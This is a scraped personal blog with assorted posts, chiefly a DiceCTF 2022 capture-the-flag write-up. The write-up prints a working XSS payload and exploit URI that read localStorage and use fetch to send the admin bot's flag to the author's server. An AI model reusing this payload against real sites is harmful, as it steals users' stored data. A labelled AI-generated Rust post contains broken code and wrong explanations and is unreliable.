for ele in cstringArrayToSeq(array, 1):
  echo ele # prints just corge
  
# DON'T DO THIS:
for ele in cstringArrayToSeq(array, 9999):
  echo ele # on my system, prints an error
  
# OR THIS:
for ele in cstringArrayToSeq(array, 3):
  echo ele # on my system, prints corge, waldo, then a blank line

Once you’re done with a cstringArray, make sure you de-allocate it, as I don’t think the GC does this for you automatically:

var array = allocCStringArray(["fred", "garply"])
deallocCStringArray(array)

blog

By · · 0 minute read

New Blog!

By · · 2 minute read

Welcome to my new blog. I’m still in the process of setting this up. I’m using Hugo + Forestry + Travis CI to have an automated CMS -> static site pipeline.

About

By · · 2 minute read

I’m interested in programming and technology. This is my personal website. I have done lots of things that I find interesting; see my homepage for a comprehensive list. I also document some of the things I use to do my computing. Some of the things I am particularly interested in are:

  • The Rust programming language, which is a programming language with very different design decisions from most other mainstream languages. I have made some contributions to rustc, the reference compiler (and presently the only complete one).
  • Free/open-source smartphones, such as the Pinephone, which are phones that can run software that is almost entirely FOSS. I find it really cool to be able to use my phone as though it were any other device I can SSH into, and being able to send and receive texts and phone calls from the command line is neat, albeit not very useful.
  • Stochastic time tracking, which is a time tracking system that randomly samples what one is doing. I am the author of TagTime Web, which is FOSS web-based software that does exactly this, and is quite featureful.
  • The color cyan, which is my favourite color.

Feel free to contact me by emailing notme@smitop.com, or one of the many other ways to contact me.

Accounts on various services

By · · 2 minute read

Email to notme@smitop.com is the best way to reach me, so do feel free to contact me. Keep in mind that I don’t actively use all of these accounts.

Email

  • notme@smitop.com is my preferred address
  • smitop2@gmail.com also works if the previous email doesn’t work for you

Programming

Social media

Chat

Other websites

AI generation: Panics in Rust

By · · 3 minute read

(j1-jumbo, temperature = 0.7)

Let’s look at a simple function that panics:

fn main() -> Result<(), String> {
    let mut buffer = vec![];
    let mut vec = vec![];
    buffer.push("hello".to_string());
    vec.push(&mut buffer[0]);
    panic!("XXX");
}

If I compile and run this program, it will panic and print an error message:

thread 'main' panicked at 'XXX', src/main.rs:5:21

The error message is pretty clear. The panic happened on line 5, and the error was "XXX". It doesn’t matter what XXX means, at least something isn’t right.

Wait a minute…

Actually, that’s not actually all that helpful. The error message is just the panic message, and that’s all it says. But, panics are supposed to say what went wrong. Let’s try forcing a panic and see what we get:

fn main() -> Result<(), String> {
    let mut buffer = vec![];
    let mut vec = vec![];
    buffer.push("hello".to_string());
    vec.push(&mut buffer[0]);
    panic!("XXX");
}
thread 'main' panicked at 'XXX', src/main.rs:5:21

Wow, that sure is unhelpful. The error message is exactly the same, and XXX isn’t very helpful either.

Let’s try some prints

In order to figure out what is going wrong, let’s add logging statements to our program. It will be helpful to see the values of the variables we are working with when the panic happens.

fn main() -> Result<(), String> {
    let mut buffer = vec![];
    let mut vec = vec![];
    buffer.push("hello".to_string());
    vec.push(&mut buffer[0]);
    println!("buffer: {}\nvec: {}", buffer, vec);
    panic!("XXX");
}
thread 'main' panicked at 'XXX', src/main.rs:5:21
buffer: [hello]
vec: [hello]

This is a lot more helpful.

Certificate Transparency stats

By · · 2 minute read

As of February 17, 2022

An “active log” is a log that contains unexpired certificates. Specifically, it includes current and future shards of annually sharded logs, and non-sharded logs that are not retired and have accepted new certificates for inclusion in the last 825 days1.

  • Certificates in active logs: 6,379,773,981
  • Certificates in non-retired logs: 10,425,597,824
  • Certificates in Google logs: 7,634,811,567
  • Certificates in active Google logs: 4,767,725,831

  1. A previous version of the Baseline Requirements required that certificates be limited to an 825-day validity period. As of Sept. 1, 2020 this has been reduced, but there are still unexpired certificates from before this change. On Dec. 6, 2022 this will change to 398 days, as the last certificate with an 825-day lifespan expires. ↩︎

DiceCTF 2022: blazingfast

By · · 6 minute read

One of the challenges in DiceCTF 2022 was web/blazingfast. It converts text you write InTo tExT LiKe tHiS. The main logic is implemented in WebAssembly, but the C source code is provided1. If we try to input an XSS payload, it detects this and the output is No XSS for you!.

There is an admin bot that will visit a URI you specify, with the flag in its localStorage, and we can use the demo URI parameter to make the admin’s browser mock text of our choosing.

Capitalization is one of those things that seems simple if you approach it from an ASCII-centric perspective, but it works in weird ways in some languages. In German, the lowercase “ß” uppercases to “SS”. Some precomposed ligatures have similar behavior: “ﬃ” (that’s a single character) uppercases to “FFI” (that’s three characters). Let’s see how this challenge handles those characters: ßßßßß gets mocked incorrectly as SsSsSSSSSS. The last half of the input didn’t get mocked!
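
To make the length problem concrete, here’s a quick demonstration of that Unicode behaviour in Rust (the challenge itself is C and JavaScript; Rust just happens to be a convenient way to show it):

fn main() {
    // Full Unicode case mapping can change a string's length.
    assert_eq!("ß".to_uppercase(), "SS");
    assert_eq!("ﬃ".to_uppercase(), "FFI");

    let input = "ßßßßß";
    let upper = input.to_uppercase();
    // 5 characters in, 10 characters out.
    println!("{input} -> {upper} ({} -> {} chars)",
             input.chars().count(), upper.chars().count());
}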

The unmocked second half is due to mismatched length handling in the WASM glue code. It starts by sending the length of the string to the WASM module, and only then converts the string to all uppercase (the WASM module works by lowercasing the appropriate letters, so it assumes the input is already all uppercase). Since uppercasing turns each ß into SS, the uppercased string is longer than the length that was sent, so the module stops partway through and the rest of the string isn’t mocked. This is great for us, since the loop that mocks the string also has an XSS check: buf[i] == '<' || buf[i] == '>' || buf[i] == '&' || buf[i] == '"'. This would be an effective check if it were run against every character. But since it isn’t, we can stick an XSS payload at the end.

There’s one problem with our XSS payload though: it gets converted to all uppercase. We need to write an XSS payload that doesn’t use any lowercase letters. I later learned that you could do this pretty easily with escape sequences, but I did it in a more convoluted way. It is possible to execute arbitrary JavaScript payloads using only symbols. JSFuck can transpile any JavaScript to JavaScript with just six symbols. Unfortunately, the generated JS is often very long, and there is a length limit of 1000 characters in the WASM glue code. As such, my solution is based on what JSFuck does, but takes advantage of more characters.

Here, we create a bunch of single-character variables using values that can be created without letters. We can use ''+!0 to get "true", ''+!1 for "false", and [][0]+'' for "undefined", then extract characters by indexing into those strings. We can use those characters to access parts of objects to get even more strings available to index from. Note that this relies on native functions being stringified in specific ways, so this is Chromium-specific.

UN=[][0]+'';FL=(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]];F=([][FL]+'');
C=F[3];O=F[27];N=UN[1];S=(''+!1)[3];T=F[21];R=(!0+'')[1];U=UN[0];E=F[29];L=(!1+'')[2];A=(!1+'')[1];
CON=C+O+N+S+T+R+U+C+T+O+R;
G=(''+''[CON])[14];F=F[0];M=((0)[CON]+'')[11];H=(+(101))[T+O+''[CON][N+A+M+E]](21)[1];

Next, we need to access two globals: localStorage which has the flag, and fetch to send data to our server. We can’t directly index on window (since that’s spelt with lowercase letters). We can get the Function global by getting the constructor property on a function we create. Then we can pass a string to Function to create a function with the contents of that string (similar to eval), then call that new function. We can access globals that way:

FN=(()=>{})[CON];
[LS,FE]=FN(R+E+T+U+R+N+' ['+L+O+C+A+L+'S'+T+O+R+A+G+E+','+F+E+T+C+H+']')();

Next, we extract the flag from localStorage and send it to our server. Conveniently the hostname and protocol of URLs are case-insensitive.

FE('HTTPS://BOX.SMITOP.COM/'+LS[F+L+A+G]);

Now that we’ve got our JavaScript, let’s format it into an exploit URI. We URL-encode the script and put it into an image tag after 500 ßs: https://blazingfast.mc.ax/?demo=[500 ß]<IMG SRC="" ONERROR="[script]">. This gives us our final URI to send to the admin bot:

https://blazingfast.mc.ax/?demo=%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%3CIMG%20SRC=%22%22%20ONERROR=%22UN%3D%5B%5D%5B0%5D%2B%27%27%3BFL%3D(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%3BF%3D(%5B%5D%5BFL%5D%2B%27%27)%3BC%3DF%5B3%5D%3BO%3DF%5B27%5D%3BN%3DUN%5B1%5D%3BS%3D(%27%27%2B!1)%5B3%5D%3BT%3DF%5B21%5D%3BR%3D(!0%2B%27%27)%5B1%5D%3BU%3DUN%5B0%5D%3BE%3DF%5B29%5D%3BL%3D(!1%2B%27%27)%5B2%5D%3BA%3D(!1%2B%27%27)%5B1%5D%3BCON%3DC%2BO%2BN%2BS%2BT%2BR%2BU%2BC%2BT%2BO%2BR%3BG%3D(%2
7%27%2B%27%27%5BCON%5D)%5B14%5D%3BF%3DF%5B0%5D%3BM%3D((0)%5BCON%5D%2B%27%27)%5B11%5D%3BH%3D(%2B(101))%5BT%2BO%2B%27%27%5BCON%5D%5BN%2BA%2BM%2BE%5D%5D(21)%5B1%5D%3BFN%3D(()%3D%3E%7B%7D)%5BCON%5D%3B%5BLS%2CFE%5D%3DFN(R%2BE%2BT%2BU%2BR%2BN%2B%27%20%5B%27%2BL%2BO%2BC%2BA%2BL%2B%27S%27%2BT%2BO%2BR%2BA%2BG%2BE%2B%27%2C%27%2BF%2BE%2BT%2BC%2BH%2B%27%5D%27)()%3BFE(%27HTTPS%3A%2F%2FBOX.SMITOP.COM%2F%27%2BLS%5BF%2BL%2BA%2BG%5D)%3B%22%3E

I then watched the request log on my server to get the flag:

2022/02/06 11:20:55 [error] 7483#7483: *33969 open() "/home/user-data/www/default/dice{1_dont_know_how_to_write_wasm_pwn_s0rry}" failed (2: No such file or directory), client: 34.139.106.105, server: box.smitop.com, request: "GET /dice%7B1_dont_know_how_to_write_wasm_pwn_s0rry%7D HTTP/2.0", host: "box.smitop.com", referrer: "https://blazingfast.mc.ax/"

  1. Although I didn’t realize that at first, and spent a considerable amount of time reverse engineering the WASM module. ↩︎

Full stream

By · · 2 minute read

This is every public thing authored by me that my stream system knows about. My homepage is generated as a filtered version of this.

Full stream - mini mode

By · · 2 minute read

Fun facts about me

By · · 2 minute read

Hashes

By · · 2 minute read
  • d7766692832c6906bf74a991692abd7b4a362f84fcca0b8f500b1c27aeef3cfc

My bookmarklets

By · · 2 minute read

These are various bookmarklets I use. You can drag them to your bookmarks bar, then click to activate them when desired.

Ps

By · · 0 minute read

Streams

By · · 0 minute read

TagTime Web changelog

By · · 2 minute read

These are the updates to TagTime Web since I started keeping a changelog (which was fairly recently).

v757 (July 29, 2021)

  • Added “Correlation” graph for finding correlations between types of pings
  • Added quick options for the last 3 tags when entering tags
  • Added option in Settings > Display to make the homescreen show a nice gradient when no tags are pending
  • Increased the font size on the homepage a bit
  • Improved the design of the logged-out homepage
  • Made it so the TTW tab is focused when a notification is clicked
  • Adjusted the wording of various messages
  • Fixed errors on some older browsers
  • Added support for hitting quote to enter last pings when in Pings page
  • API clients: added support for merging tags on backend for API clients
  • Behind the scenes: added unit tests for the backend server

TagTime Web stats

By · · 2 minute read

As of October 29, 2021:

  • 112 total accounts

  • 89 total accounts have responded to at least one ping

  • 23 accounts have never responded to a ping

  • 1 user responded to a ping in the last 30 days

  • 1 user responded to a ping in the last 7 days

  • largest database is 166 pages (1.6% of max)

Things I use

By · · 2 minute read

Inspired by uses.tech

Software

Web-based software

  • Glitch for doing some front-end development work
  • Desmos for math
  • Element for chatting over Matrix

Hardware

  • Main development computer:
    • CPU: AMD Ryzen 3400G
    • 16GB of RAM
    • 500GB SSD
    • 3 attached monitors, one 24" and two 22"
    • Pressure sensitive drawing tablet for drawing things
  • Phone: